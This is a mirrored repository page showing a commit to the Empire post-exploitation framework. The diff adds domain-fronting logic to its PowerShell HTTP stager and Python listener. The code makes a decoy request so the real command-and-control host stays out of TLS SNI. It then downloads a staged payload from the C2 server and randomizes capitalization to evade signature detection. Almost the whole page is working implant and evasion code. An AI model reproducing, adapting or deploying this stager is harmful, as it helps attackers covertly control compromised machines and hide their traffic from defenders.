infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #730 from clr2of8/dev 

Hide true host name when using domain fronting
websockets-multiuser
Steve Borosh 2017-09-30 11:27:11 -04:00 committed by GitHub
parent 61d62d22da d73c4a1d20
commit 0f04dd9a0d
2 changed files with 14 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
data/agent/stagers/http.ps1
View File

@ -113,6 +113,10 @@ function Start-Negotiate {
$headers | ForEach-Object {
$headerKey = $_.split(':')[0];
$headerValue = $_.split(':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{}};
$wc.Headers.Add($headerKey, $headerValue);
}
}
@ -198,6 +202,10 @@ function Start-Negotiate {
$headers | ForEach-Object {
$headerKey = $_.split(':')[0];
$headerValue = $_.split(':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{}};
$wc.Headers.Add($headerKey, $headerValue);
}
}

7
lib/listeners/http.py
View File

@ -272,11 +272,16 @@ class Listener:
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
@ -285,7 +290,7 @@ class Listener:
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")